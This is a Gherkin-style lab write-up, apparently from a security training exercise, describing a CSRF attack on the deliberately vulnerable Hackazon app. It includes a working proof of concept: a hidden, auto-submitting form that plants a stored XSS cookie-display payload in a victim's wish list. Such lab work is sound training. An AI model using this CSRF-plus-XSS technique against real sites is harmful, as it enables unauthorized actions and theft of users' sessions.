# language: en

Feature: Cross-Site Request Forgery
  From the Hackazon system
  Of the category Attack
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /wishlist/new
    Message: Add Wish List
    Field: ~
    Details:
      - Form to create a new wish list with the name and type fields
      - A button to submit the data that redirects to the new list
    Objective: Simulate a CSRF attack
    """

  Scenario: Attack a end user with CSRF
    Given I'm going to reuse the XSS PoC (show cookies) used in this same ctx
    And make a form that POST the payload through an ext link sent to the user
    """
    1  <body onload="document.getElementById('csrf-form').submit()">
    2    <iframe style="display:none" name="csrf-frame"></iframe>
    3    <form style="display:none" method="POST"
    4      action="http://localhost/wishlist/new"
    5      target="csrf-frame" id="csrf-form">
    6      <input value="" name="id">
    7      <input value="<script>alert(document.cookie)</script>" name="name">
    8      <input value="public" name="type">
    9      <input type="submit" value="http://192.168.99.100/wishlist/new">
    10   </form>
    11 </body>
    """
    When the victim access the target web site (hackazon) with his credentials
    And open the link that hosts the HTML code shown above
    Then it doesn't get any response because the form is enclosed in a iFrame
    And the script it's POSTed immediately on load to the victim's wish list
    But it's only when he click the item on the list that it's executed
